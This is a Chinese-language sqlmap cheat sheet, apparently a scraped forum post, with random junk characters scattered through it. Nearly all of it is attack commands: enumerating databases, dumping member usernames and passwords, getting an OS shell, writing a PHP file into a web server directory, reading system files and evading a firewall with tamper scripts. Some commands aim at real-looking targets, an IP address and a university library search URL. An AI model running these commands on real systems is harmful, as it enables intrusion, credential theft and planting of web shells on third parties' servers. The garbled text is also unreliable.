sqlmap使用实例

admin

/pentest/database/sqlmap

update :::::>     in the folder   after  execute    following   order : svn update

- r- R  l) F; ?5 Csqlmap.py -r 1.txt --current-db

. p8 _* A, A. M0 t: f1 C( Av 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
$ a% d! }. ?% Z0 M
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
' x6 W" F: O9 J  }$ g9 G0 D猜解数据库
./sqlmap.py -u "injection-url" --dbs
0 I" ?0 g+ m6 a' v' Hsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
0 X3 v  s% E( D/ m7 f6 _) \
4 Z( Q* p) v$ B1 @猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables

sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"

6 Y' `8 I4 [# z$ ]sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump

sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
' t6 I' U# V" y2 i" Vsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
% F  g. |1 i% d" Esqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
% ^, z' b1 l: {8 s% o/ t  Jsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"

) b- Q' e/ T1 qsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
. G1 P+ {8 K2 Z4 p, {* N. p1 Wsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
, b' P, p  A: B% I: o% U4 F/ osqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
8 ?( h4 Z+ w  {9 c) Fsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump

sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
1 g' T! J5 M7 l+ |
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns

sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
4 c, v- f$ ]5 a1 T9 usqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
6 ^4 z7 U% f& m/ J! e2 q! r4 ^" m1 d; J1 Z
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
" X* s% \; L7 \8 P* D- j2 R2 g&submit=Go
; Z  Q4 ?2 }/ z猜解值
) i: ^' k( Q5 X./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
+ @( k" I# y% ]! o7 G* ~. I========================================================
搜索表名中包括mana字符的
; Z* Z- _! f8 ^1 \" @) e: O/sqlmap.py -u "injection-url" -T mana --search
0 |$ R% U, }0 ~. t0 j返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
读取指定文件（需权限）
: s  l: G! e4 ^+ Q/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
% |; g9 `* l  r本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
( r2 P6 o1 _; G- Jsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
: R0 W8 C, _7 ?0 q, T' D
8 i2 i7 ]+ C, y' ?! K* {& \% msqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
8 k# q5 k- l9 W$ Z* o% r7 r" X/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
: w* N0 k1 i6 C; v9 Z7 F/sqlmap.py -u "injection-url" --is-dba
! l4 }% m" W% r( c2 p. w读取所有数据库用户或指定数据库用户的密码
/ m" y' r# _: v& I4 M3 ssqlmap.py -r 1.txt --users --passwords
: L" L  g$ \$ Z4 `( hsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"

4 E0 x4 V% C- o- {& ^6 d8 a* {. q/sqlmap.py -u "injection-url" --passwords -U root
, E1 g" h/ n+ l
2 X1 M' u; a5 b3 P- \# J" U- h--start&&--stop 与 --first&&--last 的区别
" n: \1 z0 m7 Q& F. L! R6 C$ W/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）
+ |, g# M0 x. g& R+ z
从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
8 `) f  C( {% w# C- u9 U/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
  n/ _7 @  A. r$ T5 \/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"